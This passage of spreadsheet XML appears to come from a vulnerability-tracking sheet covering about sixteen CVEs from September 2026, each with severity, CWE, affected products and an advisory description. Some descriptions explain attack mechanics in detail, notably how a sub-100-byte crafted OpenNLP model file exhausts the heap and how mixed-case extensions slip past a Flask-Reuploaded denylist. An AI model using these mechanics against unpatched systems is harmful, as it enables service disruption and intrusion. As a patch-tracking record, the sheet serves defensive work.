          <t>Flask-Reuploaded provides file uploads for Flask. From 1.5.0 until 1.6.0, UploadSet.save(storage, name=...) in src/flask_uploads/flask_uploads.py applies lowercase_ext to the default upload path but uses the case-preserving extension helper for a caller-supplied name before extension_allowed evaluates an AllExcept denylist. An attacker who controls the name override can use a mixed-case dangerous extension to bypass a lowercase denylist and store the file in the served upload directory. Exploitation requires a denylist configuration, a user-influenced name override, and a deployment that resolves or executes extensions case-insensitively; pure allowlists remain protected and path containment is not bypassed. On an execution-capable upload directory, the stored file can execute with the web server's privileges and affect confidentiality, integrity, and availability. This issue is fixed in version 1.6.0.</t>
        </is>
      </c>
      <c r="S599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54567</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57098</t>
        </is>
      </c>
      <c r="D600" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr"/>
      <c r="K600" s="5" t="inlineStr">
        <is>
          <t>microsoft:remote_desktop_client</t>
        </is>
      </c>
      <c r="L600" s="5" t="inlineStr"/>
      <c r="M600" s="5" t="inlineStr"/>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr"/>
      <c r="Q600" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R600" s="5" t="inlineStr">
        <is>
          <t>Improper verification of cryptographic signature in Windows RDP Client allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57098</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57119</t>
        </is>
      </c>
      <c r="D601" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr"/>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr"/>
      <c r="M601" s="5" t="inlineStr"/>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr"/>
      <c r="Q601" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R601" s="5" t="inlineStr">
        <is>
          <t>PraisonAI is a multi-agent teams system. Prior to 4.6.59, the unauthenticated Jobs API accepts an absolute or traversing agent_file path in POST /api/v1/runs and passes it to the job executor without a workspace allowlist or boundary check. A remote caller can cause the server to open files accessible to the service account, exposing credentials, keys, environment variables, and other local data. This vulnerability is fixed in 4.6.59.</t>
        </is>
      </c>
      <c r="S601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57119</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63126</t>
        </is>
      </c>
      <c r="D602" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="inlineStr"/>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr"/>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr"/>
      <c r="M602" s="5" t="inlineStr"/>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr"/>
      <c r="Q602" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R602" s="5" t="inlineStr">
        <is>
          <t>Wire provides gRPC and protocol buffers for Android, Kotlin, Swift, and Java. Prior to 6.4.5 and 7.0.0-alpha04, Wire protobuf readers do not consistently validate attacker-controlled lengths against the current logical message boundary before advancing cursors, pointers, limits, slices, or allocations. In Kotlin, ProtoAdapter.decode(ByteArray) and ProtoAdapter.decode(ByteString) use ByteArrayProtoReader32.internalNextLengthDelimited(), where a positive oversized length can wrap pos + length to a negative limit and escape the existing negative-length check. Related ProtoReader, ReadBuffer.readVarint(), ReadBuffer.verifyAdditional(count:), packed-repeated, nested-message, and ProtoDecoder.decodeSizeDelimited(_:from:) paths can cross logical boundaries, perform pointer arithmetic, reserve capacity, or convert an unrepresentable size before proving the requested bytes exist. An attacker who supplies malformed protobuf bytes can cause unchecked exceptions, traps, out-of-bounds behavior, or excessive allocation, resulting in denial of service without known confidentiality, integrity, or code-execution impact. This issue is fixed in versions 6.4.5 and 7.0.0-alpha04.</t>
        </is>
      </c>
      <c r="S602" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63126</t>
        </is>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B603" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C603" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63128</t>
        </is>
      </c>
      <c r="D603" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E603" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F603" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G603" s="5" t="inlineStr"/>
      <c r="H603" s="5" t="inlineStr"/>
      <c r="I603" s="5" t="inlineStr"/>
      <c r="J603" s="5" t="inlineStr"/>
      <c r="K603" s="5" t="inlineStr"/>
      <c r="L603" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M603" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N603" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O603" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P603" s="5" t="inlineStr"/>
      <c r="Q603" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="R603" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's stateful Streamable HTTP server in crates/rmcp/src/transport/streamable_http_server/tower.rs allows an unauthenticated client to send a well-formed JSON-RPC POST that is not an initialization request, or an initialization request with a mismatched protocol header, causing StreamableHttpService::handle_post to call LocalSessionManager.create_session before validating the message. An early validation failure returns without removing the inserted LocalSessionHandle from LocalSessionManager.sessions, permanently retaining session and channel state for the server process lifetime. Repeated requests can grow the shared session table without bound, degrade legitimate-client latency through lock contention, exhaust memory, and terminate the server. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S603" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63128</t>
        </is>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B604" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C604" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64761</t>
        </is>
      </c>
      <c r="D604" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E604" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F604" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G604" s="5" t="inlineStr"/>
      <c r="H604" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I604" s="5" t="inlineStr"/>
      <c r="J604" s="5" t="inlineStr"/>
      <c r="K604" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os</t>
        </is>
      </c>
      <c r="L604" s="5" t="inlineStr"/>
      <c r="M604" s="5" t="inlineStr"/>
      <c r="N604" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O604" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P604" s="5" t="inlineStr"/>
      <c r="Q604" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R604" s="5" t="inlineStr">
        <is>
          <t>A privacy issue was addressed with improved handling of user preferences. This issue is fixed in iOS 27 and iPadOS 27. An app may be able to identify what other apps a user has installed.</t>
        </is>
      </c>
      <c r="S604" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64761</t>
        </is>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B605" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C605" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65342</t>
        </is>
      </c>
      <c r="D605" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E605" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G605" s="5" t="inlineStr"/>
      <c r="H605" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I605" s="5" t="inlineStr"/>
      <c r="J605" s="5" t="inlineStr"/>
      <c r="K605" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L605" s="5" t="inlineStr"/>
      <c r="M605" s="5" t="inlineStr"/>
      <c r="N605" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O605" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P605" s="5" t="inlineStr"/>
      <c r="Q605" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R605" s="5" t="inlineStr">
        <is>
          <t>A permissions issue was addressed with improved validation. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S605" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65342</t>
        </is>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B606" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C606" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65378</t>
        </is>
      </c>
      <c r="D606" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E606" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G606" s="5" t="inlineStr"/>
      <c r="H606" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I606" s="5" t="inlineStr"/>
      <c r="J606" s="5" t="inlineStr"/>
      <c r="K606" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L606" s="5" t="inlineStr"/>
      <c r="M606" s="5" t="inlineStr"/>
      <c r="N606" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O606" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P606" s="5" t="inlineStr"/>
      <c r="Q606" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R606" s="5" t="inlineStr">
        <is>
          <t>An authorization issue was addressed with improved state management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to access sensitive user data.</t>
        </is>
      </c>
      <c r="S606" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65378</t>
        </is>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B607" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C607" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65410</t>
        </is>
      </c>
      <c r="D607" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E607" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F607" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G607" s="5" t="inlineStr"/>
      <c r="H607" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I607" s="5" t="inlineStr"/>
      <c r="J607" s="5" t="inlineStr"/>
      <c r="K607" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L607" s="5" t="inlineStr"/>
      <c r="M607" s="5" t="inlineStr"/>
      <c r="N607" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O607" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P607" s="5" t="inlineStr"/>
      <c r="Q607" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-400</t>
        </is>
      </c>
      <c r="R607" s="5" t="inlineStr">
        <is>
          <t>The issue was addressed with improved checks. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. An app may be able to cause unexpected system termination.</t>
        </is>
      </c>
      <c r="S607" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65410</t>
        </is>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B608" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C608" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66304</t>
        </is>
      </c>
      <c r="D608" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E608" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F608" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G608" s="5" t="inlineStr"/>
      <c r="H608" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I608" s="5" t="inlineStr"/>
      <c r="J608" s="5" t="inlineStr"/>
      <c r="K608" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L608" s="5" t="inlineStr"/>
      <c r="M608" s="5" t="inlineStr"/>
      <c r="N608" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O608" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P608" s="5" t="inlineStr"/>
      <c r="Q608" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R608" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Skype for Business allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S608" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66304</t>
        </is>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B609" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C609" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66307</t>
        </is>
      </c>
      <c r="D609" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E609" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F609" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G609" s="5" t="inlineStr"/>
      <c r="H609" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I609" s="5" t="inlineStr"/>
      <c r="J609" s="5" t="inlineStr"/>
      <c r="K609" s="5" t="inlineStr">
        <is>
          <t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t>
        </is>
      </c>
      <c r="L609" s="5" t="inlineStr"/>
      <c r="M609" s="5" t="inlineStr"/>
      <c r="N609" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O609" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P609" s="5" t="inlineStr"/>
      <c r="Q609" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="R609" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Skype for Business allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S609" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66307</t>
        </is>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B610" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C610" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67211</t>
        </is>
      </c>
      <c r="D610" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E610" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F610" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G610" s="5" t="inlineStr"/>
      <c r="H610" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I610" s="5" t="inlineStr"/>
      <c r="J610" s="5" t="inlineStr"/>
      <c r="K610" s="5" t="inlineStr">
        <is>
          <t>apache:opennlp</t>
        </is>
      </c>
      <c r="L610" s="5" t="inlineStr"/>
      <c r="M610" s="5" t="inlineStr"/>
      <c r="N610" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O610" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P610" s="5" t="inlineStr"/>
      <c r="Q610" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R610" s="5" t="inlineStr">
        <is>
          <t>OOM Denial of Service via Unbounded Map Pre-Sizing in Apache OpenNLP SymSpellModelSerializer
Versions Affected: 
- 3.0.0-M4
- 3.0.0-M5
(The opennlp-spellcheck extension was introduced in 3.0.0-M4. Releases 1.x and 2.x do not contain the affected code.)
Description:
The SymSpellModelSerializer.create() method reads two 32-bit signed integer count fields (unigramCount and bigramCount) from a binary SymSpell model stream and passes each value directly to LinkedHashMap.newLinkedHashMap() after validating only that it is non-negative. No upper bound is applied, so the count is fully attacker-controlled when the model file originates from an untrusted source.
A crafted .bin model file in which either count field is set to Integer.MAX_VALUE (or any value large enough to exhaust the available heap) causes the map to be pre-sized to a capacity of 2^30 entries. The oversized backing array is allocated on the first put() into that map, requesting 4–8 GB depending on whether compressed oops are in effect, and the load fails with an OutOfMemoryError. Because the count fields sit immediately after a fixed-size header (magic, format version, three UTF strings, the configuration fields, and the edit-distance identifier) the attacker pays no meaningful size cost to weaponize a payload: a file of well under 100 bytes plus a single real entry is sufficient to crash a JVM that loads it.
Any code path that deserializes a SymSpell model is affected, including SymSpellModels.deserialize(InputStream), SymSpellModels.fromBytes(byte[]), classpath model loading via SymSpellModelResolver.resolveByLanguage(String), the CorrectTextTool command-line tool, and model-archive loading through the registered ArtifactSerializer. The opennlp-spellcheck extension ships in the official OpenNLP binary distribution.
The practical impact is denial of service against processes that load SymSpell model files from untrusted or semi-trusted origins.
Mitigation:
- 3.x users should upgrade to 3.0.0-M6.
Note: The fix applies an upper bound to both count fields, checked before the map is pre-sized; counts that are negative or exceed the bound cause an IOException to be thrown and the read to fail fast with no large allocation. The bound is the existing AbstractModelReader.MAX_ENTRIES limit introduced earlie, which the current change promotes to public visibility so that serializers implementing their own binary format can share it. The default bound is 10,000,000, which is well above the entry counts of legitimate SymSpell dictionaries but far below any value that would threaten heap exhaustion. Deployments that legitimately need to load larger dictionaries can raise the limit at JVM startup by setting the OPENNLP_MAX_ENTRIES system property to the desired positive integer (e.g. -DOPENNLP_MAX_ENTRIES=50000000); invalid or non-positive values fall back to the default. Note that this property is shared with the model-reader limit and raising it relaxes both.
Users who cannot upgrade immediately should treat all SymSpell .bin model files as untrusted input unless their provenance is verified, and should avoid loading models supplied by end users or fetched from third-party repositories without integrity checks.</t>
        </is>
      </c>
      <c r="S610" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67211</t>
        </is>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B611" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C611" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67376</t>
        </is>
      </c>
      <c r="D611" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E611" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F611" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G611" s="5" t="inlineStr"/>
      <c r="H611" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I611" s="5" t="inlineStr"/>
      <c r="J611" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K611" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L611" s="5" t="inlineStr"/>
      <c r="M611" s="5" t="inlineStr"/>
      <c r="N611" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O611" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P611" s="5" t="inlineStr"/>
      <c r="Q611" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R611" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S611" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67376</t>
        </is>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B612" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C612" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69852</t>
        </is>
      </c>
      <c r="D612" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E612" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F612" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G612" s="5" t="inlineStr"/>
      <c r="H612" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I612" s="5" t="inlineStr"/>
      <c r="J612" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K612"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612" s="5" t="inlineStr"/>
      <c r="M612" s="5" t="inlineStr"/>
      <c r="N612" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O612" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P612" s="5" t="inlineStr"/>
      <c r="Q612" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R612" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="S612" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t>
        </is>
      </c>
    </row>
    <row r="613">
      <c r="A613" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B613" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C613" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69881</t>
        </is>
      </c>
      <c r="D613" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E613" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F613" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G613" s="5" t="inlineStr"/>
      <c r="H613" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I613" s="5" t="inlineStr"/>
      <c r="J613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K613" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L613" s="5" t="inlineStr"/>
      <c r="M613" s="5" t="inlineStr"/>
      <c r="N613" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O613" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P613" s="5" t="inlineStr"/>
      <c r="Q613" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R613" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="S613" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t>
        </is>
      </c>
    </row>
    <row r="614">
      <c r="A614" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B614" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C614" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69890</t>
        </is>
      </c>
      <c r="D614" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E614" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F614" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G614" s="5" t="inlineStr"/>
      <c r="H614" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I614" s="5" t="inlineStr"/>
      <c r="J614" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K614" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L614" s="5" t="inlineStr"/>
      <c r="M614" s="5" t="inlineStr"/>
      <c r="N614" s="5" t="inlineStr">
        <is>
